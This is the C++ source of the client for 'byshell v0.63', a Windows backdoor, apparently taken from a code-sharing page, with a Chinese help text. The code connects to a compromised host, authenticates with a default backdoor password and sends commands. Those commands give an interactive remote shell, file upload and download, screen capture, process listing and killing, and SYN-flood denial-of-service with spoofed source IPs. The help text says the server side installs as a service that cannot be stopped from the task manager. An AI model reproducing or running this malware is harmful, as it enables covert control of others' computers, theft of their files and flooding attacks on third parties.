?? 063cli.cpp
字號:
//byshell v0.63 cli
#include <stdio.h>
#include <iostream.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
char pwd[16]="by";char buff[66000]={0};char ip[31]={0};HANDLE filefp;unsigned int packnum=0;
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);
void helpview(void);
void main(void){int ret;char workflag=0;
//printf("\tbyshell client ver 0.63\ntype HELP to view the detailed manual.\n");
printf("please input the server ip address\n");
gets(ip);printf("%s will be connected\n",ip);
WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
sockaddr_in cliaddr;memset(&cliaddr,0,sizeof(struct sockaddr_in));
cliaddr.sin_family= AF_INET;
cliaddr.sin_port =0;
cliaddr.sin_addr.S_un.S_addr = INADDR_ANY;
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138);
srvaddr.sin_addr.S_un.S_addr = inet_addr(ip);
bind(sock,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr));
ret=connect(sock,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret==-1){printf("connect failed,check your network and remote ip.");exit(0);}
printf("input the password(the default one is \'by\')\n");
gets(pwd);int sendlength=65536;int recvlen=0;
//gets not include the \r,but scanf will
while(1){strncpy(buff,pwd,16);//copy pass before work,for chpass
workflag=work(buff+32,recvlen-32,workflag,&sendlength);sendlength+=32;
memcpy(buff+28,&sendlength,4);
if(sendlength!=send(sock,buff,sendlength,0)){printf("fatal error in transmission\n");exit(0);}
memset(buff,0,65536); recvlen=recv(sock,buff,65536,0);int duelen;memcpy(&duelen,buff+28,4);
while(duelen>recvlen){recvlen+=recv(sock,buff+recvlen,65536-recvlen,0);}//solve data division
}
}
//__finally{closesocket(sock);}
//now these are work codes.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength){
if(workflag==0){printf("%s",workbuff);
lab1: memset(workbuff,0,65536);printf("#");gets(workbuff);*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"HELP",4) || !strncmp(workbuff,"help",4)){helpview();goto lab1;}
if(!strncmp(workbuff,"shell",5)){return 1;}
if(!strncmp(workbuff,"chpass",6)){strncpy(pwd,workbuff+6,16);return 0;}
//get\tDES\tSRC,
if(!strncmp(workbuff,"get",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
sscanf(workbuff,"get\t%s\t%s",desfile,srcfile);
filefp=CreateFile(desfile,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
memset(workbuff+3,0,514);strcat(workbuff,srcfile);*psendlength=strlen(workbuff);
return 2;}
//put\tDES\tSRC
if(!strncmp(workbuff,"put",3)){packnum=0;char desfile[255]={0};char srcfile[255]={0};
sscanf(workbuff,"put\t%s\t%s",desfile,srcfile);
filefp=CreateFile(srcfile,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(filefp==INVALID_HANDLE_VALUE){printf("no such local file.\n");goto lab1;}
memset(workbuff+3,0,514);strcat(workbuff,desfile);*psendlength=strlen(workbuff);
return 3;}
if(!strncmp(workbuff,"screen",6)){packnum=0;
filefp=CreateFile("c:\\remotedesktop.bmp",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
*psendlength=strlen(workbuff);return 4;
}
return 0;
}
//
if(workflag==1){printf("%s",workbuff);memset(workbuff,0,65536);
gets(workbuff);strcat(workbuff,"\r\n");*psendlength=strlen(workbuff);
if(!strncmp(workbuff,"endshell",8)){return 0;}
return 1;
}
//get
if(workflag==2){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
if(!strncmp(workbuff,"no such file\n\0",14) && packnum==0){CloseHandle(filefp);printf("no such file\n");memset(workbuff,0,65536);goto lab1;}
//data division,especially TCP division,is BAD for us
if(rcvpacknum!=packnum+1){printf("packet dropped,redirecting");memset(workbuff,0,65536);strcpy(workbuff,"redirect");packnum+=1;memcpy(workbuff+8,&packnum,4);packnum-=1;*psendlength=12;return 2;}
DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;printf(".");*psendlength=5;return 2;}
printf("file downloaded.\n");CloseHandle(filefp);goto lab1;
}
//put
//redirect
if(workflag==3 && strncmp(workbuff,"redirect",8)==0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff+8,4);memset(workbuff,0,65520);
packnum=reqpacknum-1;SetFilePointer(filefp,4000*packnum,0,FILE_BEGIN);
DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 3;}
memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
if(workflag==3){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);
if(!strncmp(workbuff,"no privilege to write\n",21) && packnum==0){CloseHandle(filefp);printf("no privilege to write\n");memset(workbuff,0,65536);goto lab1;}
if(!strncmp(workbuff,"file system error\n",17)){CloseHandle(filefp);printf("file system error\n");memset(workbuff,0,65536);goto lab1;}
if(reqpacknum!=packnum+1){memset(workbuff,0,65536);strcpy(workbuff,"packet dropped\n");*psendlength=strlen(workbuff);return 3;}//check,but not solve
DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);printf(".");*psendlength=4005;return 3;}
memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//screen
if(workflag==4){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
if(rcvpacknum!=packnum+1){CloseHandle(filefp);printf("packet dropped\n");return 0;}//check,but not solve
DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);printf(".");if(byteswritten!=workbufflen-5){printf("warning:file system error\n");}
if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65536);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;*psendlength=4;return 4;}
CloseHandle(filefp);printf("OK\n");goto lab1;
}
return 0;
}
void helpview(void){
cout << " BYshell v0.63" <<endl;
cout << " author:b.y" <<endl;
cout << " byshell v0.61A是一個完全SDK編寫的遠程控制軟件,作者允許此軟件及其源代碼自由傳播,但引用時應(yīng)注明原出處。在聯(lián)系作者并得到同意之前,不得將此軟件改編或刪選后用作商業(yè)用途,但可用作學習和私人用途。" <<endl;
cout << " 本軟件部分功能僅僅支持NT以上的Wind0wZ系統(tǒng)。bycli.exe為客戶端(控制方),而byshell.exe為服務(wù)端(被控制端)。第一次使用時,在服務(wù)端執(zhí)行byshell.exe -install,以后當服務(wù)端上網(wǎng),byshell會以服務(wù)自動啟動,此服務(wù)不能在進程管理器中停止。要刪除服務(wù),在服務(wù)端使用byshell.exe -remove,byshell就會被清除。" <<endl;
cout << " byshell v0.61A是一個穩(wěn)定版本,在文件傳輸,命令映射等功能上相比byshell v0.61有了很大的改進和提高,修正了已知的幾乎所有BUG和缺陷。" <<endl;
cout << " 符號#是這個軟件的命令提示符。目前支持的命令:" <<endl;
cout << "cmd 在此后跟你要執(zhí)行的cmd命令,注意:只能執(zhí)行一條單獨的命令。僅僅支持NT以上的Wind0wZ系統(tǒng)。" <<endl;
cout << " eg. #cmddir c:\\winnt" <<endl;
cout << "shell 輸入此命令后,進入交互的遠程cmd,直到鍵入endshell返回#提示符。僅僅支持NT以上的Wind0wZ系統(tǒng)。" <<endl;
cout << "endshell 從shell狀態(tài)返回#提示符。" <<endl;
cout << "chpass 改變后門密碼。默認為“by”。" <<endl;
cout << " eg. #chpass123456" <<endl;
cout << "byver 查看連接的服務(wù)端的版本,新舊版本的客戶服務(wù)端間交互時,可能有嚴重的兼容性問題。" <<endl;
cout << "sysinfo 取得對方的基本系統(tǒng)信息。" <<endl;
cout << "pslist 對方進程列表。" <<endl;
cout << "pskill 殺死對方指定進程。在此后跟你要殺死的進程的PID(由pslist得到)。" <<endl;
cout << " eg. #pskill972" <<endl;
cout << "modlist 對方指定進程加載的所有DLL的列表。在此后跟你要查看的進程的PID(由pslist得到)。" <<endl;
cout << " eg. #modlist972" <<endl;
cout << "get 在此軟件的連接上下載遠程文件。命令格式:" <<endl;
cout << " get <tab鍵> 本地保存文件名 <tab鍵> 遠程下載文件名" <<endl;
cout << " eg. #get c:\\download\\file.txt d:\\sourcefile.txt" <<endl;
cout << "put 在此軟件的連接上向遠程上傳文件。命令格式:" <<endl;
cout << " put <tab鍵> 遠程保存文件名 <tab鍵> 本地上傳文件名" <<endl;
cout << " eg. #put d:\\receive\file.txt c:\\sourcefile.txt" <<endl;
cout << "screen 遠程截屏到本地,保存為“c:\\remotedesktop.bmp”文件,由此可查看遠程桌面。" <<endl;
cout << " 搞笑功能,開懷一笑:" <<endl;
cout << "popmsg 彈出信息框。" <<endl;
cout << " eg. #popmsghello,are you all right?" <<endl;
cout << "swapmouse 遠程鼠標左右鍵交換。" <<endl;
cout << "storemouse 遠程鼠標左右鍵復原。" <<endl;
cout << "hidesys 隱藏遠程桌面和任務(wù)欄。" <<endl;
cout << "showsys 恢復遠程桌面和任務(wù)欄。" <<endl;
cout <<endl;
cout << "警告:以下的SYN功能有一定的危險性,僅僅用做測試。如果用戶非法使用此功能攻擊合法站點,將自己承擔全部法律后果。" <<endl;
cout << "SYN 使用服務(wù)端發(fā)起SYN洪水的拒絕服務(wù)攻擊測試。" <<endl;
cout << "參數(shù):SYN 測試對象 測試的分鐘數(shù) IP偽造類型(可選參數(shù),0是完全偽造,1是C段偽造,2是不偽造,默認為0) 攻擊對象端口(可選參數(shù),默認為80WWW端口) 使用的端口(可選參數(shù),0是隨機變化,默認為0)\n";
cout << "如果選擇了某個可選參數(shù),那么在它左邊的可選參數(shù)就必須被選擇,在它右邊的可選參數(shù)則可以忽略。" <<endl;
cout << " eg. #SYN 172.18.1.5 15" <<endl;
cout << " eg. #SYN 172.18.1.5 15 1" <<endl;
cout << " eg. #SYN 172.18.1.5 15 1 445 12345" <<endl;
cout << "queryDOS 查詢服務(wù)端SYN攻擊測試的詳細情況。" <<endl;
cout << "endDOS 強制結(jié)束服務(wù)端的SYN作業(yè)。" <<endl;
cout << "\n 由于作者是初學者,水平有限,程序一定存在很多BUG。謝謝各位朋友、前輩指教:" <<endl;
cout << " 華東師大軟件學院04級 白遠方 baiyuanfan@163.com" <<endl;
cout << "注:screen功能中用到的DDBtoDIB代碼來源為xfocus.net的網(wǎng)友hzzh,著作權(quán)歸他所有。" <<endl;
cout << " 特別感謝在我寫這個小軟件時給了我很大幫助的gxisone(谷夕),glacier(黃鑫)和xfocus.net的所有朋友,是他們的支持使我這個初學者能夠克服困難和疑惑,最終完成這個程序。" <<endl;
cout << "" <<endl;
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -